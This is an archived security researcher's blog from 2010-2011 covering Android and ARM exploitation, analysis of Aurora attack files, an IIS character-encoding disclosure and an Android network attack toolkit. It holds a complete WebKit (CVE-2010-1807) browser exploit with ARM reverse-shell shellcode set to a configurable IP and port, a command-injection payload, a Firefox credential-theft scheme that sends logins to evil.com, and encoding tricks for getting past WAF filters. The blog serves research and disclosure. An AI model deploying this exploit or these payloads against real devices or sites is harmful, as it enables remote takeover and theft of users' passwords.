Zukifying Security

Anti - Android Network Toolkit 2.1 is out

2011-10-28T03:01:00.002+02:00

Android Network Toolkit (Anti) Capabilities Video

2011-10-03T03:34:00.002+02:00

One of the comments asked about how to use the app, I think the best would be posting that recently I helped in designing one of our videos, this is the result:
This video aims to help understand Anti's options quickly.
That was the main purpose, enjoy!

Anti - Android Network Toolkit Release Information

2011-08-08T18:55:00.016+03:00

The full Android Network Toolkit (Anti) app/APK is located at : http://anti.zimperium.com

In-order to download the App (version 2.1) click on Register & Download, Choose email/password and you may download straight to your phone.
Make sure 3rd party application is enabled on your phone via Settings -> Applications -> Unknown Sources.

p.s:
The app is also available via Android Market (lite version without *ANY* offensive capabilities in-order to fully comply with Android/Google ToS), named : "AntiLite".

Enjoy & Thank you for all the feedback/support!!

Older posts:
~~The App is not available to general public now.~~ App is available to BETA testers, read end of post.
We're working very hard to get an public official release ASAP.
The APK will be available via the official market.

Please DO NOT WRITE your emails in the comments : you may register for pre-release at : Anti - Android Network Toolkit Site
RC1 is out. and has many improvements (such as: RC1's Spy Plugin is now supporting direct link browsing & username/password sniffing capabilities).
Press contact : press@zImperium.com
Future updates will be posted on zImperium's website

UPDATE (EOD 15/10/2011): Anti - Android Network Toolkit BETA
UPDATE (20/10/2011): New version of Anti BETA is out!

We've done major improvements on both Anti the app, and on our server side.
Major fixes done:
        - Exploit server is now online.
        - After successful PC exploitation options are: Screenshot, Process list, Execute command, Reboot, and more to be implemented soon.
        - While exploiting - New progress bar.
        - Uploading files to HTTP Server running on the phone
        - Spy plugin works now.
        - Minimum version required for Anti now is Android 2.1Update1 which means, more devices are capable of running Anti now!.
        - UI Fixes.
        - New design for attack circle.
        - Small bug fixes.
If you're currently in the beta, uninstall your current version and download the new plugins from the BETA Site

PLEASE DO NOT POST EMAILS IN COMMENTS.

1st Place at 'Vulnerable Mobile Application' Contest

2011-07-14T02:56:00.005+03:00

Our submission to the vulnerable APP contest won the 1st place - Motorola XOOM tablet!

Here's one way to exploit the app:

Simple command injection input : "/sdcard/xyz.log:thisifa`/system/bin/id > /sdcard/zukilog.log`fakeemail@gmail.com:this is my new message"

I will share the source and more possible ways to exploit it post Blackhat/DEFCON...

Creating a vulnerable Android application

2011-07-04T17:43:00.002+03:00

Vulnerable Android App

Follow me on twitter @ihackbanme

Okay, so this was a little journey to create the most vulnerable Android app for a competition by Jack Mannino (first prize was Motorola XOOM).

I must say, I've been creating lots of vulnerable programs in the past as PoCs/research, but it was usually just one security bug or two, so it was easy to determine when it was the actual security bug for the research or another bug, by mistake.
In this app, there are so many bugs, and we've also decided to write it as bad as possible with as much bad code habits we can possibly create (like tons of variables that are used for the same string or not being used at all, etc), a thing which led it to be almost impossible to debug and add features.
What I think we should have done was creating a working application first, and then adding vulnerabilities and making the code as bad as possible.
The App requests more permissions than it uses. In-app exploitation will not lead to root, but will lead to very high capabilities which another app didn't initially have requested upon installation.
Also,this app can be remotely exploited.
Download the MoshZuk Application: contains the following vulnerabilities:

Stack Overflow
Heap Overflow
SQL Injection
Command Injection
Format Strings
Double Free
Directory Traversal
Race Condition
Hardcoded Passwords
Bad code habits
Overblown permissions
Bad file permissions

The best part is, we've specially constructed the vulnerabilities so it can be chained (extra points in this competition):
e.g Unchecked permissions (or unchecked sender) may lead to -> Directory traversal + RACE Condition + Heap(or stack) Overflows / Command injection.
First the APK will be released only, so you can test it out and use it to find vulnerabilities within it. After a while we will release some demos and exploitation methods. I hope that we will be able to maintain it to add more vulnerabilities + ways to exploit it, remote and locally (possibly via intents to make it easier).

What the app does is to send from one GTalk client to another (must have 2 email accounts). A Gtalk message will be sent to the user which will be able to respond a message according to a protocol of MoshZuk.
What is it being used for? Send yourself quick notes so you can remind yourself later via reading the log file or via reading GTalk history.
The protocol for incoming messages is delimited by ":", any other message will receive a "Not supported in protocol" message [HINT: Only 2 ":" are needed per message].
I can tell more about it, by I prefer that you will reverse it and enjoy it more!

Check logcat for details on debug info!
Download MoshZuk APK is here, I will release the code later on!
Enjoy!

The application was developed by Moshe Vered and Itzhak 'Zuk' Avraham, Feel free to hack it as much as possible, don't forget to write your exploits in the comment section :)

Debugging Environment on Android (Webkit + Symbols)

2011-02-16T19:49:00.004+02:00


Android Debugging

Follow me on twitter @ihackbanme

If you read this, most likely you've tried to debug something on Android and found out it's not as easy as you would have wanted it to be.
Here's a short tutorial, from my memory to get it working. If I forgot something, please write it down in the comments and I will keep this post updated.

First, There are many mistakes that can be made. The documentation/instructions and warnings under Google's Android website are less useful and you can find yourself compiling the whole environment of Android 2.1 on Ubuntu 8.04 (which is a very big mistake, and you'll waste your time - so don't do it!).

Make sure you use latest Ubuntu (I'm not a big fan of Ubuntu, as a Slackware user for the last 10 years, but apt-get just does a good job in this setup) to build latest Android.

Download Android using GIT & REPO:

repo init -u git://android.git.kernel.org/platform/manifest.git -b <version>
e.g : 
repo init -u git://android.git.kernel.org/platform/manifest.git -b eclair

This should take a few hours... ;)

Compile Webkit with debugging flags, I'm quite sure this link was helpful, but I also quite sure there were few mistakes which I don't remember, I do remember it wasn't perfect buildspec.mk so just change it to fit your debugging needs.
The link had the following instructions:
Debug Native C++ Code:

To get meaningful debug info, you do need to build WebCore with -
O0. It is simple. Add the following to your buildspec.mk and rebuild webcore and xml2.

 Use "rm out/target/product/dream/system/build.prop" (zuk's comment: I'm also sure they had path mistakes ;), take that into considerations) to make sure it takes effect.
To rebuild webcore and xml2:
make clean-libwebcore clean-libxml2 && make //DO NOT DO THAT YET!!!

Prepare your environment by downloading all the right packages at once (all in one line! yey!):

sudo apt-get install git-core gnupg sun-java5-jdk flex bison gperf libsdl-dev libreadline5-dev libesd0-dev libwxgtk2.6-dev build-essential zip curl libncurses5-dev zlib1g-dev build-essential

uninstall java, and install java 1.5:
sudo update-java-alternatives -s java-1.5.0-sun

"If you don't have buildspec.mk under the root directory yet, please copy build/buildspec.mk.default to the root (android/)

Change to the following lines :
DEBUG_MODULE_libwebcore:=true
DEBUG_MODULE_libxml2:=true
TARGET_CUSTOM_DEBUG_CFLAGS:=-O0 -mlong-calls
Add "ADDITIONAL_BUILD_PROPERTIES += debug.db.uid=100000" so that it
will wait for you to connect gdb when crashed.

in Webkit folder (for eclair branch only):

git commit / stash
git cherry-pick 18342a41ab72e2c21931afaaab6f1b9bdbedb9fa

Environment setup (fix paths if needed):

export PATH="/usr/lib/jvm/java-1.5.0-sun-1.5.0.22/:$PATH"
export JAVA_HOME="/usr/lib/jvm/java-1.5.0-sun-1.5.0.22"
export ANDROID_JAVA_HOME=$JAVA_HOME
export PATH=$PATH:$JAVA_HOME/bin
chmod +x ./build/env-setup.sh
source ./build/env-setup.sh #make sure you use the source command and not trying to execute the file itself...
make clean-libwebcore clean-libxml2; make

Now debugging will be made possible using gdbserver, adb and gnu-arm-eabi-gdb client (use latest gdb! they had tons of bug fixes - great job!).
You will also be able to compile native code easily by having Android.mk and executing:

source /path/to/androidhome/build/env-setup.sh;
mm;

Happy debugging

Black Hat D.C Presentation - Popping Shell on A(ndroid)RM Devices

2011-01-24T03:26:00.001+02:00

I had a great time presenting at Black Hat D.C 2011.

Popping Shell on A(ndroid)RM Devices slides

Presenting at Black Hat DC - January 2011

2010-12-16T18:51:00.008+02:00

Follow me on twitter!

I will be giving a talk on "Popping Shell on A(ndroid)RM Devices" at Black Hat DC 2011

If anyone wants to meet up for beers/coffee ping me on twitter.

Presentation abstract:
The attendees will gain knowledge on how to exploit ARM buffer overflows, use Ret2ZP attack and will few demos for local and remote attacks using Ret2ZP technique.

Input validation issue exists in WebKit's handling of floating point data types; vulnerability in webkit (work against Android 2.0/2.1 versions)

2010-11-14T18:20:00.011+02:00

Follow me on twitter!

I've written a new exploit, based on MJ's, with better success rate from my observation and easier to adjust to your ip/port. This shellcode is using a 1 instruction nopsled, instead of ~1700 instructions+shellcode together, so understanding/adjusting the shellcode itself is easier.

<html>

<head>

<script>

//This code is only for security researches/teaching purposes,use at your own risk!



// bug   =  webkit remote code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807

//patched=  android 2.2, some said it works on some devices with 2.2.

//originally noticed/written by mj(good job man!)

//Found by Luke Wagner of Mozilla (Great work :))

//new exploit version by Itzhak Zuk Avraham (itz2000[AT]GMAIL[DOT]COM) - http://imthezuk.blogspot.com



var ip = unescape("\ua8c0\u0100"); // ip = 192.168.0.1

var port = unescape("\u3930"); //port 12345 (hex(0x3039))

//var ip = e.g: unescape("\u000a\u0202"); //ip = 10.0.2.2



function trigger()

        {

  var span = document.createElement("div");

  document.getElementById("BodyID").appendChild(span);

  span.innerHTML = -parseFloat("NAN(ffffe00572c60)"); //memory corruption when handling invalid values...

        }

function exploit()

        {    

 var nop = unescape("\u33bc\u0057"); //LDREQH R3,[R7],-0x3C for nopping

 do

 {

  nop+=nop;

 } while (nop.length<=0x1000);

 var scode = nop+unescape("\u1001\ue1a0\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");

 scode += port;

 scode += ip;

 scode += unescape("\u2000\u2000");

 target = new Array();

 for(i = 0; i < 0x1000; i++)

     target[i] = scode;

 for (i = 0; i <= 0x1000; i++)

 {

  document.write(target[i]+"<i>");

  if (i>0x999)

  {

   trigger();

  }

 }

}

</script>

</head>

<body id="BodyID">

Enjoy!

<script>

 exploit();

</script>

</body>

</html>

The reason I've spent some time in writing this version is because now it's more flexible to changes, a bit more understandable of each goal/part of the exploit and the success rates are 20%-30% higher from what I've observed, also, shellcode is shorter and easier to analyze to see that there's no harm, etc. Feel free to play with the amount of memory to allocate. Only for research/study purposes and not for using it on others. Enjoy

Stealing client passwords from Firefox Password Manager

2010-08-20T00:52:00.003+03:00

Follow me on twitter!

After I've attended the Jeremiah Grossman's talk at blackhat and saw the bug I've reported last year, I was thrilled to see the bug being exploited in a nice way!
I got to admit, that when I spoke to a friend and told him about this bug, he told me that he did a research on the exact same subject [not on a browser specific though]. He deserves credit of-course, His name is Adi Sharabani and the paper is called "Active MiTM attacks".
Originally posted the following at Mozilla Firefox's Bugzilla in 2009:
"I've found a bug in the design of the password manager of Firefox.
This affects *any* Firefox version so far that has password keeper.

Entering to a website allows the password manager to fill in the
credentials of username/password and other privacy related details.
Typical example :

If a malicious user creates a copy of that url and spoof it with DNS
poisoning or MiTM, the login credentials fill in immediately but the
page doesn't submit.

However, as a malicious user creates this page, he also controls the content!
So let's add to the crafted page the following lines :
[This is a page I've created using copying twitter.com/login source
(without even trying to fix the design) :]

But wait, it fills the same credentials for the faked page as-well! Let's add
the 4 lines to the bottom of the fake page and walla :

That itself, is not the threat. Because in MiTM if the password wouldn't have sent to encrypted server,
you would have gotten it anyway, the threat is of-course, that we can force Firefox to send out
credentials to pages you haven't even tried to log on to on a hostile wifi :)
If we do a simple script in evil.com that identifies the referrer of the
request using the referrer field in HTTP POST Request we can do
iteration over every website that can store credentials on non-encrypted pages that contain the forms :

In log_creds.py :
document.location=nextsite;
if list is over, and all the username/passwords for linkedin,twitter,facebook,..., are stolen you can leave the user alone and let him actually surf the net.
Like I wrote, stealing those credentials can be made even on websites the user didn't even intend of going into on a hostile wifi (using 0sized iframe)."

Defcon Presentation

2010-08-03T18:37:00.004+03:00

Follow me on twitter!

Here are the presentation for ARM Exploitation that was given in Defcon (minus the pictures of myself at 3AM and those funny pictures) : DEFCON18 - ARM Exploitation Presentation
Also, The updated whitepaper for ARM Exploitation can be found here : DEFCON18 - ARM Exploitation White Paper.

On a personal note : I'd like to say that DEFCON18 was awesome! and Thanks for coming to my presentation!
The picture is only of less than 2/3 of the crowd because I couldn't picture all in one shot! It was wicked!

So you can find yourself, inhere :

Defcon presentation

2010-08-01T16:47:00.000+03:00

Hold on, I didn't put the picture online... come back in 2 hours after the talk and see yourself screaming "owned".

Will be releasing 1-2 Firefox bugs here soon...
Cya in few hours...

Speaker at DEFCON-18 [Las Vegas]

2010-06-11T10:48:00.000+03:00

Hey there,
I've had a great time talking at SANSFIRE event, and also got the news that I will be speaking at DEFCON18 in Las Vegas later on this year.
I will speak on "defeating ARM security mechanisms & full exploitation". If you're there, drop by to say hello!!

Till then, Happy exploitation! :)

eD2k hash collision attacks

2010-04-25T22:19:00.003+03:00

2 friends (Uzi Tuvian & Lital Porat), have done a nice research on ed2k collision attacks, here you go :

About the paper:
In the paper we discuss the implications of the MD4 collision attacks that were developed in the past few years on the ed2k protocol (the protocol used in today's eDonkey network). Since ed2k uses the MD4 hash function to generate unique file identifiers, these collisions allow a well-crafted file to exist in various different versions across the network. Some of these versions might be legit and some might be malicious, but a user of the current network have to way to distinguish which version of the file he or she is downloading.
Just to be clear - this does not mean that an attacker might inject malicious versions of pre-existing files in the network; It does mean that an attacker (or an organization) might, for example, introduce new colliding files to the network and leverage on the popularity of the legit file to mascaraed the malicious one or even, under some circumstances, send the malicious version to targets of his choice. One of the scenarios we discuss (one that might already be happening) is of a warez group that can use the network as an attack platform in order to gain access to a selected subset of it's users by distributing illegal content and performing such 'low-profile attacks' on well-chosen targets. These targets can be hosts residing in certain countries or networks, hosts running certain OS versions or whatever parameter which might interest the attacker.
In the paper, we discuss the different techniques that might be used to optimize and hide the attack and it's results, scenarios and attack vectors that are made possible due to this issue, and a tool we've put together that can be used to generate such malicious files in very high efficiency.

You can download the paper from here

ad_1_.jpg unpacking/analysis - Aurora

2010-04-17T20:06:00.003+03:00

In this post we'll try to run Aurora as non-administrative user, and debug ad_1_.jpg which used by the attackers right after the attack.Well, I was very curious about other files in the attack, after not able to unpack the msconfig32.sys, and thought, maybe other files will give me clues on msconfig32.sys and might give me a way of unpacking it.

I've looked into USCERT advisory regarding the Aurora attack, and saw interesting file, with no explain of what it does, named ad_1_.jpg, it says that the file is XOR'd with 0x95, but nothing else :
Original advisory looked like this :

So it got me curious. I got the file from my friends where I write as-well : malwareint.com
It took me a while to get from this file in the advisory to the original file, the problem was, that I didn't know on how this file got dropped and that what was hard to find out how the attacker opened it in the computer of the victim. It wasn't very important if the file wasn't also packed with other packer (UPX) so every byte was important to be restored as original.

I've understood how to DeXOR it correctly (it was XOR to every byte which is not 0x00 or 0x95, with 0x95), attached python algorithm for it :

After unpacking the file to the original file (inside the UPX), I've uploaded it to virustotal, and saw the file was analyzed in the beginning of February (now, 36 out of 40 Anti-Virus catches it).

So, I had it in mind that the file might have been already analyzed, and after analyzing it myself, I've seen that the reports I've read, were from this file (Service creation name, querying important files such as rasmon.dll). So people have already analyzed it for us. I get to save time.

I also wanted to check 2 interesting stuff :
1. Why there was used a BAT file in the attack (and what it did?).
2. Can the attack run as simple user (not admin).

The answer for 1 was simple, (file name was : c:\windows\DFS.bat)
after quick reverse-engineering tricks you can get the value of it before it's deleted :

The batch file supposed to run in loop and wait for the handle that catches the exe to allow it to be deleted. If it's not deleted, it will try again. After the file was deleted (it uses dynamic name, that's why it's running from my desktop[on VM]), it deletes the bat file himself. Actually it's a nice trick to verify deletion of exe file after it's done executing, because deleting the exe within the file himself will not succeed without any trick (handle will be locked).
A little tip to this module-writer would be : next time use the /f on del command, it might give you better chances :P

2. Did it work as non-administrative-user? It didn't work as a normal user and didn't try to use any kind of privilege escalation while I was testing it. It also failed doing changes in the registry, and dropping files on c:\windows.
I didn't test it too much because of what I said above (that it's already got tested by others), but from a regular behavior-check tests, it didn't work as non-administrative user.

What can we learn from 2? That if Google have used proper user rights on their computer, initial installation of Aurora, wouldn't have work. It appears that non-admin user would have been enough since the exploit which the attackers used, runs remote code as the user who run internet-explorer.

Regarding the msconfig32.sys? Well... I've tried to implement my unpacker to do the same here, didn't go quite well yet. But I still got hope on this one :). For Mcafee, I wouldn't say it's not related to the attack, I actually think it is :
Two patterns which we see here :
1. Both files used some kind of repeating XOR in every section of the file.
2. Both files used different extension for the file from what it really was.

Under this scenario I'd say that they are related and from the same authors in the attack. Sorry Mcafee,
If it was up to me to decide, I would have suggested USCERT to put msconfig32.sys back on their advisory if it was up to me to decide.

Follow me on twitter under @ihackbanme:)

McAfee : Aurora files report contained amateur botnet files

2010-04-03T22:00:00.001+03:00

Well... Maybe they did contain some other files. Here's the link for the article : http://bit.ly/amk2EE.
They are saying that :
"McAfee included four filenames in its original Aurora research that it now says are associated with the Vietnamese botnet: jucheck.exe, zf32.dll, AdobeUpdateManager.exe and msconfig32.sys."

But are they not related? Well.. you just need to believe them. Don't you?
I don't know about the rest of the files, but I know about msconfig32.sys. It was really really hard to get my hands on this one. If it was a botnet regular file I would have gotten it much faster.
And when I searched for it, I did find some malware named the same. but it wasn't the binary :).
Also, I have another proof that relates msconfig32.sys to other file, which means both used same method in the attack. I cannot disclose any more details now.

msconfig32.sys is a tricky name, and that's what got McAfee's eyes wrong (in my opinion). Well, There were viruses with the same name (which was a real driver... BTW) + viruses with the name of msconfig32.exe - They were all a tricky name which wanted to sound like a system name : msconfig.exe (which is also the command to disable start-up programs [from registry] or see services which have no Microsoft's signature on it). It's like calling a trojan : svchost32.exe.

It's a bad name for a trojan. But that's what used in the attack. So, saying that it was a regular botnet's file, would be just weird (wait for my future post :) ). Yes, of course some malware used the name msconfig32.sys (as a real driver this time) sometime in history, it doesn't mean they are related.

I cannot post anymore details currently, about my new leads, so I better shut up now.

Cheers!

Aurora .sys file used in the attack - External file analysis

2010-03-19T20:25:00.002+02:00

First of all, I'd like to thank MalwareInt where I write as a researcher for getting me this precious file.

In the Aurora attack, 1 .sys file had been used, called : msconfig32.sys.
I was pretty curious about what does this driver do, and why no one else in the world had analyzed it.
It had been a terrible journey to get the file. No one had it. No one wanted to share it. I was pretty lucky to group up with MalwareInt and they had the right connections to get this file.

Like I've told to large number of people, there are lots of reasons to use drivers in this kind of attack, but it's pretty clear the attackers weren't about to hide itself or its connections. The only thing I could have think of is writing a driver to get information about the physical status of the screen (Because the attackers used patched version of VNC, a driver could query the status of the screen, and if it's shut/stand by it's safe to work, also, this kind of driver could have saved restore points of the computer before the attacker started to look for files inside of the computer and once the screen is up, restore everything to its original state - more of this idea is on my presentation on ihackbanme.com and can be downloaded here

But it appears that this is not the case. That's what I was looking for. That what I've been trying to search for, but it had been there the whole time. The .sys file, wasn't a driver.

Let's first take a quick look at the file (.sys file is a PE)

Well? what's that? why are there 0x20 all over the file? it's supposed to be 0x00 in those areas.. It's obviously a XOR. It does have a base like a PE, but it sure does look different, XORed or some kind of anti-reverse engineering on it. That's the first look.
Let's take a look at +- same size of other, valid, Microsoft driver :

Can you notice the difference? Where's it's usually 0x00 there are 0x20. Weird. Let's look further in the msconfig32.sys file :

Wait?!@@#$ Why are there .dll files mentioned after the Resource mark? Havn't seen that in a driver before... Let's again take a look at a valid driver again :

We don't see that kind of stuff, yet we continue to see 0x20 instead of parts where there should be 0x00...
Weird. Maybe it's an exe instead? Let's not give up! Let's try to load it and see if the driver can be loaded as-is. I've chosen to use SCM (Service Control Manager) built in mechanism to load drivers, instead of writing a loader myself. Driver can be loaded in lots of ways, including replacing other sys file, quick registration in windows registry or other ways (You can find some more information in the Rootkit - Subverting The Windows Kernel book - page 40 : The quick and dirty way to load a driver, or pages 46,47. Enjoy).
I've decided to use SCM, and load the driver using SC. So let's do it :
First I've done a re-check, to see that I havn't changed the file, The file I needed was msconfig32.sys from Aurura attack with the following md5 : 7a62295f70642fedf0d5a5637feb7986), After I've done that, I've written a sc command to load the driver from : c:\msconfig32.sys.
The command and the checks are attached in the following picture :

The specified driver is invalid?! How about that? The file is certainly not a valid sys driver (as is, it might be changed a bit to be fit as a .sys file). So what is it?
Trying the regular approach of opening the file in PEExplorer/IDA/Olly/PE Parsers/... wouldn't work, as the file is quite damaged in a way the headers are totally corrupted and the way the file behave something is under there, but it's not a regular .sys file.
So... Let's try to mess with it a bit, maybe XORing again with 0x20, gave nothing. Other ideas I've tried (tried so many I can't even write them all), didn't go well. The file appeared to be curroupted.

Trying to load it as a dll, or opening it under .exe failed as-well.

I did try to play with it a bit more, and found that CERT had issued an advisory in which they have written the following stuff :

ad_1_.jpg

MD5: CD36A3071A315C3BE6AC3366D80BB59C Byte Size: 34816

Appears to be packed executable. Significant portion of file is XOR'd0x95

There's another file, with .jpg, and he's not a jpg. The file is XOR'd with 0x95. Does it ring a bell? Yes it does. I think it's the same kind of method used, but this time, they have called their file .sys instead.
Or, The file was being downloaded, step after step, and till they finish the download they first create a file, filled with 0x20s and they overwrite it with the real file. That could have explained the size of it (4kb). (*on another note, if you have the ad_1_.jpg file, please send it to me, I'm really looking for this file and can't really find anyone who has it*).

So I've checked, is the file compressed? How can I check without knowing what kind of compression is used? The easiest thing is to take the payload of the PE file, and write it to another file. After I've done that, I tried to compress it again, and guess what? The file, after compression, was bigger then the original. Meaning the payload-part was compressed.
Still couldn't figure out what it contained. I will continue to research it and hopefully soon I will find something :). Too bad it wasn't a real driver though...

I hope you liked my external analysis, because I couldn't examine the file (as it was "corrupted" or at-least not in a valid format). sometimes it's all that can be done. Although, now we know that this file wasn't a real driver (but still, might have contained one within - compressed).

Cheers.
Itzhak Avraham

hooking for fun and profit 2 - logging function calls

2010-03-15T19:57:00.003+02:00

Well... I've hooked the function calls to log my calls to system()... but wait... what does system() do?

Let's create a simple program that runs argv[1] as system(%s) and run strace on it :

We can see that we don't see a real call to any *exec* functions. But that's not true isn't it? We're missing something.... Clone() is like a fork, let's see what it does by following it with "-f"

Looks much better... now let's look at the bottom of it:

YES! finally! An execve function had been called! We wanted to see how it was called!
But that's a bit boring, isn't it? Let's create a function that hooks the execve function, as-well as system function, and start a new shell and we'll trace what happens from the time you click on bash (with all the init scripts..), till the end of its execution...

Hooking the function of execve and system :

Let's create that file using echo "" > /tmp/system_calls.log and let's compile it using
gcc -shared -fPIC -o libexechook.so sys_exec.c -ldl

Now! It's the fun part! Let's do the following command to start the hook :
export LD_PRELOAD="./libexechook.so"; bash

Let's run what happens at the start of the bash :

(all except the last command...)

I hope that now you're less afraid of hooking functions. It's very profitable for some purposes.
The reason I've decided to post this, is because I haven't seen much of hooking examples which are not using parameters / or only one. Might be useful to someone, one day.
Enjoy.

Linux functions hooking using LD_PRELOAD - for fun and profit

2010-03-11T15:36:00.005+02:00

Well... I had to log some calls for a specific function which calls some binary.
So, instead of doing it in the proper way, I've replaced the binary to call another binary and then to switch between them. It did work, 90% of the time, but some race conditions sometimes made it not effective.
That's when I've decided to use LD_PRELOAD and do a proper hook instead of binary replacing with shell script, which caused race conditions in about 10% of calls to that binary.

Well? It's sort of the same for any function. Take the function and its variables from the declaration do whatever you want and call the original function (if you want to have the original functionality).

Easy to write, and much better solution

Here's a piece of example

taken from : http://www.technovelty.org/code/c/override.html. Life saver!

Lesson learned, don't be lazy, do a proper hooks to avoid race conditions :)

Microsoft IIS 5.0,5.1 possibly 6.0 information disclosure and self decoding behaviour

2010-02-13T15:58:00.004+02:00

On 31/12/2009 I've contacted Microsoft regarding the following issue which:

Affects : IIS 5.0, IIS5.1, Maybe 6.0 as-well. Didn't work for >= 7.0.

Information :

I’ve done some fuzzing in-order to find some weaknesses at one application I was testing for fun, but in the middle of doing this process I’ve found a neatsecurity bug which is not in common knowledge and that’s what makes it a risk.

Let's create a weird circumstances where this could become handy : Let’s say a content-filtering program wants to blockanything that goes into a gif file “blockedkeyword.gif" in upload directory (i.eI’ve seen this in for example dotdefender Web-Application Firewall),

WAF's job would be blocking anything that translates into blockedkeyword.gif (in UTF8, UTF7, etc...)

If a word would translate to blockedkeyword.gif, WAF's job would be dropping the request.

But if we’lluse special characters which are not in common-knowledge to block, we canbypass this one and many other mechanism.

Instead of writing

we can write

i.e put the HTML codeabove in firefox or IE8 and you'll find out that for IIS had decided to translate on his own the Greek-Letter OMEGA to "o". Why would IIS do that? I have no idea.
It also works for other letters such as τ for "t", κ for "k" etc...

Usually pentesters/hackers will look for special ways to write requests such as : Unicode, or other encodings. But it shouldn’t be, in any way, thatIIS decides to translate Ω or other greek letters to plain English.

Impact: Under certain terms, it might lead to :

a.      Information Disclosure(tells which version of the website if site had decided to remove it from headers) - I will try to contact tenable to create a plugin out of this information described here.
b.     Bypass security restrictions.
c.      Bypass security mechanismchecks for common letters such as “t” in every encoding, but not as τwhich shouldn’t be translated to “t” at server side.
d.     More research could lead to other findings with this issue such as low chances of : DirectoryTraversal/Remote Code Execution/Other information disclosure : Might lead todirectory traversal/security bypass (it depends if there’s another unknown letters who translates to “.” or “/” or “\\”).

I havn't had any success in exploiting this issue in using malformedclient-side code (i.e : xss) since it doesn't parse like real t's or 'o's for client side code havn't yet checked impact on Server side code. Filenames restrictions does seem to bevulnerable to this issue though.

Real life example : Big commerce website such as ebay does have a reason to hide its server version (running IIS or Apache, which version, etc...). Although this is not the case this post can confirm you're not being mislead by a wrong header (which someone put there for letting attackers failed at the first attempt and anyone would be ready when they try more attempts).

Can you see that logo in the top left of ebay?

Let's abuse the logo's name in-order to get relevant information about this server... is it running an out-dated IIS or new IIS/APACHE?

Image path is : http://pics.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif let's change the "o"s for Ωs and try again after building the following custom html page :

I just checked it and it looks like they have changed to Apache or newer IIS, well, After contacting ebay they have changed the server pretty fast. Luckily I got screenshot to point this out

If you want to try it out you can also check out : with this image as-well from a very popular news website

<imgsrc="http://www.ynet.co.il/images/CENτRαL_wlΩgΩ.gif">

Few decodings you can use now :

t <== τ ==>
%CF%84
%%43%46%%38%34
%%%43%46%38%34

o <== Ω ==>
%CE%A9
%%43%47%%41%39
%%%43%47%41%39

Or just the alpha presentation of them, i.e : Τ α Ω etc.

Vendor Contacted (Microsoft) : 31/12/2009
Vendor response :"After investigation we have determined that this functionality is bydesign. ...
Character encoding issues are complex and servers behave in differentways. If a particular Web Application Framework cant deal withdifferent encodings the general consensus is that it is the WAF's faultdue to the fact that it is trying to make a security guarantee that itcan not live up to".
My response to Vendor response :
This problem can be used for information disclosure. I know itworks for IIS 5.0, and IIS 5.1....
It doesn't work on IIS >= 7.0.
If that was planned then why this functionality had been removed from later versions?
I don't think it's the WAF's fault since no-one is aware of this issue (WAF's writers)...
Thisbug is definitely not critical or harmful, but it can be dangerous insome cases (i.e : telling the user that the server is running old IISto try some exploits on it which he wouldn't have tried before becauseadmin removed server header, or bypassing some applications with thisencoding)."

I got better advisories which I'm waiting for other vendors to patch before I publish. I've published this because Microsoft will not release a patch (probably) for this issue, although it did make EBAY to switch from IIS to APACHE after few days of contacting them. I wonder if that got any impact on Microsoft.

Enjoy!

China vs. Google presentation at Microsoft R&D

2010-02-03T23:39:00.002+02:00

Hey there,
I know it's not like the real presentation with the demonstrations and such.
Also, please note that the Pie of people is just for demonstartion and the numbers doesn't really mean anything.

Enjoy the slides : http://www.ihackbanme.com/presentation/Google Vs. China Presentation.pdf

EDIT : I've been informed that the Chinese law had changed its penalty regarding to hacking. Instead of death penalty a 3-7 years and/or a fine is given depends on the act.

Administrator account VS. SYSTEM account

2010-01-09T15:37:00.004+02:00

Follow me on twitter!

I've recently seen a trojan that ran as Administrator and yet tried to run privilege escalation exploit to gain SYSTEM (instead of using API to elevate the privileges from Administrator to SYSTEM).
This is what made me write this post :

Let's say there are 2 programs vulnerable to remote-code-execution bug.
1. One is running as SYSTEM
2. One is running as Administrator.

Little pre-post-information regarding exploitation : If you run your exploit against a process which runs as Administrator, Your payload will run as Administrator. If you run it against SYSTEM account your payload will run as SYSTEM account.

Which one you would want to exploit more?
95% of security people, will say : "the SYSTEM one, off-course SYSTEM is much stronger than admin, it's the strongest user in the OS".
I'd say : it doesn't matter and I might slightly want to run as Admin instead of System. Why? This is what this blog-post is all about.

First of all, Admin leads to SYSTEM, in relatively easy to use API. It's legally authorized by the OS, and Admin has the rights to impersonate as SYSTEM. Meaning admin can execute his payloads as SYSTEM.

Do you remember the AT (c:\windows\system32\at.exe) command? Its object is to run things through the Scheduler Service (as SYSTEM). But wait, how can it run things as SYSTEM? Does it work for every user in the OS? even the non-administrative users? No.
AT command only works for administrative users (Local Admin, Domain admins, or SYSTEM account himself). So it means that any administrative user can run command as SYSTEM. Let's see what AT.exe does :
Quick reverse engineering will show us which function AT uses.

The function AT uses to register in the scheduler service would be : NetScheduleJobAdd.
Does it mean we can add jobs our self to run on localhost (127.0.0.1) as SYSTEM? Yes (if you have rights, which any local/domain Administrator has).
Didn't check it on the schtasks.exe, but it's probably same thing or other function, but the point is, Admin leads the way to SYSTEM.

When you think about it, you need SYSTEM account in several occasions only, but when do you need administrator account?
Well, Did it occur to you that you have hacked to a SYSTEM account in a pentest and wanted to get more information regarding the user who runs this computer shares, the user folder mappings and stuff like that?
If it did, than you know it would be best to use Impersonation to Admin *EVEN* if you're already running as SYSTEM ("Downgrading your privileges") account and run a thread or another process as Admin.
If you would do : net use/subst/other commands as SYSTEM you wouldn't see the same results the Admin gets for the same commands (because of session separation).

Also, You'd be able to view remote shares as Admin (if the user running this computer has remote shares he sees), you'll be able to view them and have the same rights to them on a remote computer (without knowing/changing the Admin's password)! As SYSTEM you wouldn't have it. At all. bummer.

There are very few times when I really need the SYSTEM account so I guess I'll want to be Admin-user in the first place and execute my shell again under SYSTEM account (only if needed), instead of running SYSTEM account and execute my shell as Admin if I needed.

